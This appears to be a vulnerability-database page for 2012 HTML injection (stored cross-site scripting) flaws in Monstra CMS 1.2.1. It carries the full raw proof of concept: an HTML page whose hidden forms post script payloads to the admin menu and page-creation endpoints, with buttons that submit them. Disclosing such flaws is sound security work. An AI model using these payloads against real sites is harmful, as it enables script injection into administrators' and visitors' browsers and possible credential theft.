Monstra 1.2.1 Multiple HTML Injection Vulnerabilities

vendor:

Monstra

by:

Tojmi Sesvidja

7,5

CVSS

HIGH

HTML Injection

CWE

Product Name: Monstra

Affected Version From: 1.2.1

Affected Version To: 1.2.1

Patch Exists: YES

Related CWE: N/A

CPE: a:monstra:monstra

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

Monstra 1.2.1 Multiple HTML Injection Vulnerabilities

Monstra is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to generate unexpected HTML output.

Source

Exploit-DB raw data:

<!--source: https://www.securityfocus.com/bid/55171/info

Monstra is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Monstra 1.2.1 is vulnerable; other versions may also be affected. -->

<html> 
<head> 
<title>Monstra 1.2.1 Multiple HTML Injection Vulnerabilities</title> 
</head> 
<body> 
<form id="add_menu" method="POST" action="http://www.example.com/monstra/admin/index.php?id=menu&action=add">
 <input type="hidden" name="csrf" value="a7de775dce681ae31b7e8954d6305667b0df69e0" />
 <input type="hidden" name="menu_add_item" value="Save" />
 <input type="hidden" name="menu_item_link" value='"><script>alert(1);</script>' />
 <input type="hidden" name="menu_item_name" value='"><script>alert(2);</script>' />
 <input type="hidden" name="menu_item_order" value="0" />
 <input type="hidden" name="menu_item_target" value="" /> 
</form> 

<form id="add_page" method="POST" action="http://www.example.com/monstra/admin/index.php?id=pages&action=add_page">
 <input type="hidden" name="add_page_and_exit" value="Save and exit" />
 <input type="hidden" name="csrf" value="a7de775dce681ae31b7e8954d6305667b0df69e0" />
 <input type="hidden" name="day" value="21" />
 <input type="hidden" name="editor" value="Tojmi Sesvidja" />
 <input type="hidden" name="minute" value="17" />
 <input type="hidden" name="month" value="08" />
 <input type="hidden" name="page_description" value="Zero Science Lab" />
 <input type="hidden" name="page_keywords" value="ZSL-2012-5101" />
 <input type="hidden" name="page_name" value="XSS" />
 <input type="hidden" name="page_title" value='"><script>alert(3);</script>' />
 <input type="hidden" name="pages" value="0" />
 <input type="hidden" name="second" value="29" />
 <input type="hidden" name="status" value="published" />
 <input type="hidden" name="templates" value="index" />
 <input type="hidden" name="year" value="2012" /> 
</form> 

<script type="text/javascript"> 

function xss1(){
document.forms["add_menu"].submit();
} 

function xss2(){
document.forms["add_page"].submit();
} 

</script> 

<input type="button" value="Execute XSS 1" onClick="xss1()" /> 
<br /><br /> 
<input type="button" value="Execute XSS 2" onClick="xss2()" /> 

</body> 
</html>